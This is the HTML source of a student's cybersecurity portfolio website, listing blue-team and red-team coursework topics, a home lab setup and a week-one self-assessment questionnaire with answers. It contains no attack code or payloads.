          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
